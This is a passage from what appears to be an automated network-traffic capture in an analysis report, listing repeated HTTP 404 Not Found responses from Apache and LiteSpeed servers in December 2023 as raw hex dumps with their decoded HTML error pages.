76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:23:45 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:23:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:23:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:23:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:24:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:24:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:24:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:24:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:24:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 